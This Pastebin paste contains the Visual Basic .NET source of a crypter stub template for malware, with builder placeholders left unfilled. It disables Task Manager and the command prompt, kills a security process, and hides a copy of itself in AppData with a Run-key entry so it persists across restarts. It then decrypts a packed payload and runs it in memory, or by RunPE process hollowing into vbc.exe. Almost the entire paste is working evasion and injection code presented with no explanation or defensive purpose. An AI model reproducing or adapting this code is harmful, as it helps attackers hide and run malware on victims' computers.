Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Imports System.Windows
- Imports System
- Imports System.Net
- Imports System.IO
- Imports System.Text
- Imports System.Reflection
- Imports System.Windows.Forms
- Imports System.IO.FileStream
- Imports Microsoft.VisualBasic
- Imports System.Runtime.InteropServices
- Imports System.ComponentModel
- Imports Microsoft.Win32
- Imports System.Diagnostics
- Imports System.Runtime.CompilerServices
- Imports System.Object
- #VersionInfo#
- #fakejunk1#
- Module %1%
- Dim %2% As String = %3%
- Dim c As New PolyXorbyMiharbiDono("EncryptionKEY")
- Dim %4% As Byte() = c.PolyDeCrypt(DeCompress(Convert.FromBase64String(%2%)))
- Dim %5% As String = "%6%" & ".exe"
- Dim Auto As String = "%88%"
- Dim DotNet As String = "%999%"
- Dim startup As String="%90%"
- Dim AntiT As String = "ThisnThat"
- Dim AntiTaskss As String="antitask"
- Dim Dna As String="disablecmd"
- Dim AntiSystems As String="antisystem"
- Dim antimals As String="antimal"
- Dim microSs As String="microS"
- Dim vbc As String=Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
- Public Function DeCompress(ByVal input() As Byte) As Byte()
- Dim m As New IO.MemoryStream(input)
- Dim c As New IO.Compression.DeflateStream(m, IO.Compression.CompressionMode.Decompress)
- Dim Buffer() As Byte
- Dim Offset As Integer = 0
- Dim Count As Integer = 0
- While True
- ReDim Preserve Buffer(Count + 100)
- Dim Bytes As Integer = c.Read(Buffer, Offset, 100)
- If Bytes = 0 Then Exit While
- Offset += Bytes
- Count += Bytes
- End While
- ReDim Preserve Buffer(Count - 1)
- Return Buffer
- End Function
- Sub Main()
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- if Dna="T" then
- Try
- My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "1", Microsoft.Win32.RegistryValueKind.DWord)
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- if AntiTaskss="T" then
- Try
- Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide)
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- If startup = "T" Then
- Try
- IO.File.Copy(System.Windows.Forms.Application.ExecutablePath, _
- System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
- & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
- IO.File.SetAttributes(System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
- & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath), IO.FileAttributes.Hidden)
- My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
- True).SetValue("1" & System.Windows.Forms.Application.ProductName, _
- System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
- & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
- addtostartup_Adminreq("%111%", Application.ExecutablePath)
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- If DotNet = "T" Then
- Dim thr1 As New Threading.ThreadStart(AddressOf Exe)
- thr1.Invoke()
- Else: End If
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- If antimals = "T" Then
- Try
- AntiMalwarebytes()
- Catch ex As Exception
- End Try
- End if
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- If Auto = "T" Then
- Try
- Assembly.Load(%4%)
- Dim thr As New Threading.ThreadStart(AddressOf RunExe)
- thr.Invoke()
- Catch e As Exception
- if os.is64Bit()=True Then
- RunPE.Inject(%4%,vbc)
- Else
- RunPE.Inject(%4%,vbc)
- End If
- End Try
- Else: End If
- End
- End Sub
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- Public Sub addtostartup_Adminreq(ByVal Name As String, ByVal Path As String)
- Try
- Dim Registry As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
- Dim Key As Microsoft.Win32.RegistryKey = Registry.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
- Key.SetValue(Name, Path, Microsoft.Win32.RegistryValueKind.String)
- Catch ex As Exception
- End Try
- End Sub
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- Function AntiMalwarebytes()
- Dim malwarebytes As Process() = Process.GetProcesses
- Dim i As Integer
- For i = 0 To malwarebytes.Length - 1
- Select Case Strings.LCase(malwarebytes(i).ProcessName)
- Case "Msseces"
- malwarebytes(i).Kill()
- Case Else
- End Select
- Next
- End Function
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- Public Sub RunExe()
- Dim Resource As String = String.Empty
- Dim ResourcesBuffer As Byte() = %4%
- Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
- Dim entryPoint As MethodInfo = [assembly].EntryPoint
- Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
- entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
- End Sub
- Public Sub Exe()
- Dim Resource As String = String.Empty
- Dim ResourcesBuffer As Byte() = %4%
- Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
- Dim entryPoint As MethodInfo = [assembly].EntryPoint
- Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
- entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"2"}})
- End Sub
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- public Class os
- 'this will check for 64 bit and 32 bit ops
- Public Shared Function is64Bit() As Boolean
- If Not System.Environment.GetEnvironmentVariable("ProgramW6432") = "" Then
- Return True
- Else
- Return False
- End If
- End Function
- End Class
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- Public Class RunPE
- Public Const PAGE_NOCACHE As Long = &H200
- Public Const PAGE_EXECUTE_READWRITE As Long = &H40
- Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
- Public Const PAGE_EXECUTE_READ As Long = &H20
- Public Const PAGE_EXECUTE As Long = &H10
- Public Const PAGE_WRITECOPY As Long = &H8
- Public Const PAGE_NOACCESS As Long = &H1
- Public Const PAGE_READWRITE As Long = &H4
- Public Const PAGE_READONLY As UInt32 = &H2
- Public Shared Sub Inject(ByVal data() As Byte, ByVal target As String)
- Dim C = New Context, SH As Section_Header, PI = New Process_Information, SI = New Startup_Information, PS = New Security_Flags, TS = New Security_Flags
- Dim GC = GCHandle.Alloc(data, GCHandleType.Pinned)
- Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
- Dim DH As New DOS_Header
- DH = Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
- GC.Free()
- Dim CP As CP = CreateAPI(Of CP)("kernel32", "CreateProcessA")
- Dim GTC As GTC = CreateAPI(Of GTC)("kernel32", "GetThreadContext")
- Dim RPM As RPM = CreateAPI(Of RPM)("kernel32", "ReadProcessMemory")
- Dim WPM As WPM = CreateAPI(Of WPM)("kernel32", "WriteProcessMemory")
- Dim UVS As UVS = CreateAPI(Of UVS)("ntdll", "ZwUnmapViewOfSection")
- Dim VA As VA = CreateAPI(Of VA)("kernel32", "VirtualAllocEx")
- Dim STC As STC = CreateAPI(Of STC)("kernel32", "SetThreadContext")
- Dim RT As RT = CreateAPI(Of RT)("kernel32", "ResumeThread")
- If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
- Dim NH As New NT_Headers
- NH = Marshal.PtrToStructure(New IntPtr(Buffer + DH.Address), NH.GetType)
- Dim Address, Offset As Long, ret As UInteger
- SI.CB = Len(SI)
- C.Flags = 65539
- If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return
- If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
- GTC(PI.Thread, C)
- RPM(PI.Process, C.Ebx + 8, Address, 4, 0)
- UVS(PI.Process, Address)
- Dim ImageBase As UInt32 = VA(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
- If ImageBase <> 0 Then
- WPM(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
- Offset = DH.Address + 248
- For I As Integer = 0 To NH.File.Sections - 1
- SH = Marshal.PtrToStructure(New IntPtr(Buffer + Offset + I * 40), SH.GetType)
- Dim Raw(SH.Size) As Byte
- For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
- WPM(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
- Next I
- Dim T = BitConverter.GetBytes(ImageBase)
- WPM(PI.Process, C.Ebx + 8, T, 4, ret)
- C.Eax = ImageBase + NH.Optional.Address
- STC(PI.Thread, C)
- RT(PI.Thread)
- End If
- End Sub
- Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
- Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
- Private Shared Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
- Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
- End Function
- <StructLayout(0)> Structure Context
- Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
- Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
- End Structure
- <StructLayout(0)> Structure Save
- Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
- Dim State As UInt32
- End Structure
- Structure Misc
- Dim Address, Size As UInt32
- End Structure
- Structure Section_Header
- Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
- End Structure
- Structure Process_Information
- Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
- End Structure
- <StructLayout(0, CharSet:=3)> Structure Startup_Information
- Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
- Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
- End Structure
- <StructLayout(0)> Structure Security_Flags
- Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
- End Structure
- <StructLayout(0)> Structure DOS_Header
- Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
- Dim ID, Info As UInt16
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
- Dim Address As Int32
- End Structure
- Structure NT_Headers
- Dim Signature As UInt32, File As File_Header, [Optional] As Optional_Headers
- End Structure
- <StructLayout(0)> Structure File_Header
- Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
- End Structure
- <StructLayout(0)> Structure Optional_Headers
- Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
- Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
- Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
- <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory()
- End Structure
- <StructLayout(0)> Structure Data_Directory
- Dim Address, Size As UInt32
- End Structure
- Delegate Function CP(ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As Startup_Information, <Out()> ByRef info As Process_Information) As Boolean
- Delegate Function WPM(ByVal process As IntPtr, ByVal address As Integer, ByVal buffer As Byte(), ByVal size As Integer, <Out()> ByRef written As Integer) As Boolean
- Delegate Function RPM(ByVal process As IntPtr, ByVal address As Integer, ByRef buffer As Integer, ByVal size As Integer, ByRef read As Integer) As Integer
- Delegate Function VA(ByVal process As IntPtr, ByVal address As Integer, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
- Delegate Function UVS(ByVal process As IntPtr, ByVal address As Integer) As Long
- Delegate Function RT(ByVal thread As IntPtr) As UInt32
- Delegate Function GTC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
- Delegate Function STC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
- End Class
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- Public Class PolyXorbyMiharbiDono
- Public Function PolyDeCrypt(ByVal Data() As Byte) As Byte()
- 'This Function is the exact reverse of the crypt function.
- 'we should Decrypt to get our last randomized data.
- Data = XorCrypt(Data, Encoding.Default.GetBytes(Key))
- Dim i As Integer
- 'Now in the other function the return value is a one byte bigger array. lets remove that one
- Dim ReturnBuffer(Data.Length - 2) As Byte
- 'we started from Byte n# 0 to the last one. we'll play it reversed now.
- For i = Data.Length - 1 To 1 Step -1
- 'We just remove The previous byte value from the current one Mod 256. simple
- ReturnBuffer(i - 1) = ModuloByte(Data(i), -Data(i - 1))
- Next
- 'That's it. The Buffer is one byte less then the data. Perfect. Return it.
- Return ReturnBuffer
- End Function
- 'A Positive Mod 256. This will prevent a non byte value. the result is always >= 0 and <= 255
- Private Function ModuloByte(ByVal MyByte As Byte, ByVal Addition As Int16) As Byte
- While Addition < 0
- Addition += 256
- End While
- Return Convert.ToByte((MyByte + Addition) Mod 256)
- End Function
- Private Function XorCrypt(ByVal Data() As Byte, ByVal Key() As Byte) As Byte()
- If Key.Length <> 0 Then
- Dim i As Integer
- For i = 0 To Data.Length - 1
- Data(i) = Data(i) Xor ModuloByte(Key(i Mod Key.Length), [Key](Key(i Mod Key.Length) Mod Key.Length)) Xor [Key](((i + (i Mod 7)) Mod Key.Length) Mod Key.Length)
- Next
- End If
- Return Data
- End Function
- Private sKey As String = ""
- 'Property, will Give us acces to the key.
- Public Property Key() As String
- Get
- Return sKey
- End Get
- Set(ByVal value As String)
- sKey = value
- End Set
- End Property
- 'Inisalization. (New Constructor)
- Public Sub New(ByVal Key As String)
- Me.Key = Key
- End Sub
- Public Sub New()
- Me.Key = ""
- End Sub
- End Class
- '------------------------------------------------------------------------------------------------------------------
- '------------------------------------------------------------------------------------------------------------------
- End Module
- #fakejunk2#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement